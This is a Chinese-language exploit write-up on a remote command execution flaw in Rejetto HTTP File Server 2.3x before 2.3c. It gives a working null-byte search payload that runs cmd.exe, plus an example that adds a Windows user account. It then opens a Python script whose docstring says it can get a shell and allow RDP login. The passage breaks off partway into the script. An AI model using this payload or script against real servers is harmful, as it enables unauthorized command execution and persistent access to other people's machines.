一、HFS漏洞
1、影响版本 : 2.3c以前的2.3x版本
2、HFS:
HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。
3、漏洞描述:
HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。
Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
4、攻击payload及过程:
4.1 Payload:http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c [Command-String].}
4.2攻击过程实例:
http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}
说明这个OK的前提是HFS以管理员权限运行:
5、payload:
1 #-*- coding:utf-8 -*- 2 3 """ 4 这个脚本是检测是否有HFS漏洞的 5 当HFS版本处于2.3c机器之前的HFS2.3x版本均可以 6 当HFS以管理员身份运行时候可以get-shell 7 原理是创建一个新用户,设置密码和权限,然后你就可以RDP了 8 """ 9 10 #引入依赖的包、库文件 11 import time 12 import uuid 13 import requests 14 from optparse import OptionParser 15 16 17 #定义扫描类 18 class